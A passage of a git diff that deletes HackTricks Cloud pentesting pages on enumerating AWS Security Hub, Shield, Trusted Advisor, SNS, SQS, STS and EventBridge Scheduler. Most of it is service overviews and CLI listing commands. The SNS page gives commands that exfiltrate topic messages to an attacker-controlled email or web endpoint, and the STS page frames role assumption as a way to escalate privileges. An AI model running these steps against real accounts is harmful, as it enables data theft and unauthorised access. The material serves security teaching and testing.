-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md deleted file mode 100644 index ec054c188..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md +++ /dev/null @@ -1,89 +0,0 @@ -# AWS - Security Hub Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security Hub - -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. - -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts - -**Characteristics** - -* Regional (findings don't cross regions) -* Multi-account support -* Findings from: - * Guard Duty - * Config - * Inspector - * Macie - * third party - * self-generated against CIS standards - -## Enumeration - -``` -# Get basic info -aws securityhub describe-hub - -# Get securityhub org config -aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error - -# Get the configured admin for securityhub -aws securityhub get-administrator-account -aws securityhub get-master-account # Another way -aws securityhub list-organization-admin-accounts # Another way - -# Get enabled standards -aws securityhub get-enabled-standards - -# Get the findings -aws securityhub get-findings - -# Get insights -aws securityhub get-insights - -# Get Automation rules (must be from the admin account) -aws securityhub list-automation-rules - -# Get members (must be from the admin account) -aws securityhub list-members -aws securityhub get-members --account-ids -``` - -## Bypass Detection - -TODO, PRs accepted - -## References - -* [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) -* [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md deleted file mode 100644 index b6ee0fa3a..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Shield Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Shield - -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. - -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. - -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. - -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md deleted file mode 100644 index 518251fd6..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ /dev/null @@ -1,97 +0,0 @@ -# AWS - Trusted Advisor Enum - -## AWS - Trusted Advisor Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Trusted Advisor Overview - -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: - -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. - -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. - -### Notifications and Data Refresh - -* Trusted Advisor can issue alerts. -* Items can be excluded from its checks. -* Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. - -### **Checks Breakdown** - -#### CategoriesCore - -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions - -#### Core Checks - -Limited to users without business or enterprise support plans: - -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. Service Limits - -#### Security Checks - -A list of checks primarily focusing on identifying and rectifying security threats: - -* Security group settings for high-risk ports -* Security group unrestricted access -* Open write/list access to S3 buckets -* MFA enabled on root account -* RDS security group permissiveness -* CloudTrail usage -* SPF records for Route 53 MX records -* HTTPS configuration on ELBs -* Security groups for ELBs -* Certificate checks for CloudFront -* IAM access key rotation (90 days) -* Exposure of access keys (e.g., on GitHub) -* Public visibility of EBS or RDS snapshots -* Weak or absent IAM password policies - -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. - -## **References** - -* [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md deleted file mode 100644 index 2c3753a36..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md +++ /dev/null @@ -1,106 +0,0 @@ -# AWS - SNS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. - -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. - -### **Difference with SQS** - -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. - -### **Enumeration** - -```bash -# Get topics & subscriptions -aws sns list-topics -aws sns list-subscriptions -aws sns list-subscriptions-by-topic --topic-arn - -# Check privescs & post-exploitation -aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt - -# Exfiltrate through email -## You will receive an email to confirm the subscription -aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com - -# Exfiltrate through web server -## You will receive an initial request with a URL in the field "SubscribeURL" -## that you need to access to confirm the subscription -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="danger" %} -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). - -Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. -{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md" %} -[aws-sns-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sns-privesc.md" %} -[aws-sns-privesc.md](../aws-privilege-escalation/aws-sns-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sns-post-exploitation.md" %} -[aws-sns-post-exploitation.md](../aws-post-exploitation/aws-sns-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sns-persistence.md" %} -[aws-sns-persistence.md](../aws-persistence/aws-sns-persistence.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md deleted file mode 100644 index e4c425669..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - SQS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. - -### Enumeration - -```bash -# Get queues info -aws sqs list-queues -aws sqs get-queue-attributes --queue-url --attribute-names All - -# More about this in privesc & post-exploitation -aws sqs receive-message --queue-url - -aws sqs send-message --queue-url --message-body -``` - -{% hint style="danger" %} -Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. -{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md" %} -[aws-sqs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sqs-privesc.md" %} -[aws-sqs-privesc.md](../aws-privilege-escalation/aws-sqs-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sqs-post-exploitation.md" %} -[aws-sqs-post-exploitation.md](../aws-post-exploitation/aws-sqs-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sqs-persistence.md" %} -[aws-sqs-persistence.md](../aws-persistence/aws-sqs-persistence.md) -{% endcontent-ref %} - -## References - -* https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md deleted file mode 100644 index ad755d115..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ /dev/null @@ -1,126 +0,0 @@ -# AWS - STS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## STS - -**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). - -Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. - -### Assume Role Impersonation - -The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. - -For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. - -#### Assume Role Logic - -In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::role/priv-role" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). - -However, if a role is allowing an account to assume it, like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. - -If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). - -### Enumeration - -```bash -# Get basic info of the creds -aws sts get-caller-identity -aws sts get-access-key-info --access-key-id - -# Get CLI a session token with current creds -## Using CLI creds -## You cannot get session creds using session creds -aws sts get-session-token -## MFA -aws sts get-session-token --serial-number --token-code -``` - -### Privesc - -In the following page you can check how to **abuse STS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-sts-privesc.md" %} -[aws-sts-privesc.md](../aws-privilege-escalation/aws-sts-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sts-post-exploitation.md" %} -[aws-sts-post-exploitation.md](../aws-post-exploitation/aws-sts-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-sts-persistence.md" %} -[aws-sts-persistence.md](../aws-persistence/aws-sts-persistence.md) -{% endcontent-ref %} - -## References - -* [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm\_source=pocket\_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md deleted file mode 100644 index c90be6f1d..000000000 --- a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ /dev/null @@ -1,107 +0,0 @@ -# AWS - EventBridge Scheduler Enum - -## EventBridge Scheduler - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EventBridge Scheduler - -**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. - -There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." - -### Types of Schedules - -Types of Schedules in EventBridge Scheduler: - -1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. -2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. -3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. - -Two Mechanisms for Handling Failed Events: - -1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. -2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. - -### Targets - -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. - -**Templated targets** support the following services: - -* CodeBuild – StartBuild -* CodePipeline – StartPipelineExecution -* Amazon ECS – RunTask - * Parameters: EcsParameters -* EventBridge – PutEvents - * Parameters: EventBridgeParameters -* Amazon Inspector – StartAssessmentRun -* Kinesis – PutRecord - * Parameters: KinesisParameters -* Firehose – PutRecord -* Lambda – Invoke -* SageMaker – StartPipelineExecution - * Parameters: SageMakerPipelineParameters -* Amazon SNS – Publish -* Amazon SQS – SendMessage - * Parameters: SqsParameters -* Step Functions – StartExecution - -### Enumeration - -```bash -# List all EventBridge Scheduler schedules -aws scheduler list-schedules - -# List all EventBridge Scheduler schedule groups -aws scheduler list-schedule-groups - -# Describe a specific schedule to retrieve more details -aws scheduler get-schedule --name - -# Describe a specific schedule group -aws scheduler get-schedule-group --name - -# List tags for a specific schedule (helpful in identifying any custom tags or permissions) -aws scheduler list-tags-for-resource --resource-arn -``` - -### Privesc - -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/eventbridgescheduler-privesc.md" %} -[eventbridgescheduler-privesc.md](../aws-privilege-escalation/eventbridgescheduler-privesc.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md deleted file mode 100644 index c999e66ce..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - Unauthenticated Enum & Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Credentials Leaks - -A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ -Some useful **tools**: - -* [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) -* [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) -* [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) - -## AWS Unauthenticated Enum & Access - -There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: - -* [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) -* [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -* [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) -* [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -* 